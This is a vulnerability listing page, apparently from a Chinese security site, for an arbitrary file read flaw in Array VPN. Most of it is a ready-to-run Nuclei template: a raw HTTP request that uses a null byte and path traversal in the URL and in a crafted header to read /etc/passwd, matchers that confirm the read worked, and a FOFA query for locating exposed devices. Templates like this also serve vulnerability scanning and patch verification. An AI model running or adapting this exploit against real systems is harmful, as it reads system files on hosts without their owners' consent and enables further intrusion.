array-vpn-lfi: Array VPN - Arbitrary File Reading Vulnerability

日期: 2025-08-01 | 影响软件: Array VPN | POC: 已公开

漏洞描述

Array VPN Arbitrary File Reading Vulnerability

PoC代码[已公开]

id: array-vpn-lfi

info:
  name: Array VPN - Arbitrary File Reading Vulnerability
  author: pussycat0x
  severity: high
  description: |
    Array VPN Arbitrary File Reading Vulnerability
  reference:
    - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: product="Array-VPN"
  tags: lfi,vpn,arrayvpn,vuln

http:
  - raw:
      - |
        GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/prx/001/http/localh"

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 401
# digest: 490a00463044022065594effae3cf1f9d6f822ad4b83954590c81203c27888fe38774c6927476785022035c1bfc1fb972dd0a00e4b4d3dcb50d62c3a4b7f79fee8c68d0d788d0e938b42:922c64590222798bb761d5b6d8e72950

相关漏洞推荐